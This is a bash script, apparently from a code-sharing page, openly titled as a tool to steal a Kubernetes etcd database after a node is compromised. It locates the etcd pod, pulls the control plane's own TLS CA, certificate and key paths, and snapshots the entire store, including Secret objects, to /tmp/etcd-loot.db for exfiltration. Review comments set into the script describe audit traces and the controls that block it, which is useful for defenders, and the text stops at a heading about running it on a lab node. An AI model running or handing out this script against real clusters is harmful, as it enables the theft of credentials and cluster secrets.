Quick bash script to steal an etcd database
# This script attempts to take a snapshot of the kubernetes etcd database for exfiltration | |
# This should be run post-compromise of a node | |
#!/usr/bin/env bash | |
# NOTE(review): read this as a defender. Every step below leaves a
# standard trace: the two kubectl calls are API-server requests (recorded
# when audit logging is enabled), etcdctl is executed with the control
# plane's own TLS files as its client identity, and the output is written
# to a fixed, predictable path under /tmp. Those are the signals to
# monitor for, and restricting read access to the etcd PKI files is the
# control that stops the snapshot step.
#
# Terminal colour escapes used only for the status messages.
NOCOLOR=$(tput sgr0) | |
RED=$(tput setaf 1) | |
GREEN=$(tput setaf 2) | |
BLUE=$(tput setaf 4) | |
YELLOW=$(tput setaf 3) | |
# Status prefixes: "[+]" for progress, "[!]" for failure.
TICK="$NOCOLOR[$GREEN+$NOCOLOR] " | |
TICK_ERROR="$NOCOLOR[$RED!$NOCOLOR] " | |
# Locate the etcd pod: list kube-system pods and keep the first column of
# every line containing "etcd". The name is printed for the operator.
echo -n $TICK"Checking for etcd pod name in$BLUE kube-system$NOCOLOR namespace... " | |
ETCD_NAME=$(kubectl get pods -n kube-system | grep etcd | awk '{print $1}') | |
echo $YELLOW $ETCD_NAME | |
# Describe the pod and pull the values of three etcd command-line flags:
# --trusted-ca-file, --cert-file and --key-file. Each is a file path
# taken from the text after the first "="; etcdctl below opens these
# paths locally, so they must exist on the machine running this script.
ETCD_INFO=$(kubectl describe pod -n kube-system $ETCD_NAME) | |
ETCD_CACERT=$(echo "$ETCD_INFO" | grep '\--trusted-ca-file'| cut -d"=" -f 2) | |
ETCD_SERVERCERT=$(echo "$ETCD_INFO" | grep '\--cert-file' | cut -d"=" -f 2) | |
ETCD_KEY=$(echo "$ETCD_INFO" | grep '\--key-file' | cut -d"=" -f 2) | |
# Snapshot the store with the v3 API, authenticating with the server's
# own certificate and key. An etcd snapshot is the whole key-value store,
# which includes Secret objects; they are stored in plaintext unless
# encryption at rest is configured for the cluster (confirm per cluster).
# Detection hooks: etcdctl "snapshot save" outside of backup tooling, and
# creation of a .db file in /tmp by a non-backup process.
echo $TICK"Attempting to save etcd databse snapshot to $BLUE/tmp/etcd-loot.db"$NOCOLOR | |
ETCDCTL_API=3 etcdctl --cacert=$ETCD_CACERT --cert=$ETCD_SERVERCERT --key=$ETCD_KEY snapshot save /tmp/etcd-loot.db | |
# Report the outcome from etcdctl's exit status.
if [ $? -eq 0 ];then | |
echo $TICK"Etcd snapshot success, stored in $BLUE/tmp/etcd-loot.db!"$NOCOLOR | |
else | |
echo $TICK_ERROR$RED"Failed to take snapshot of etcd database!"$NOCOLOR | |
fi |
Running this on a lab node: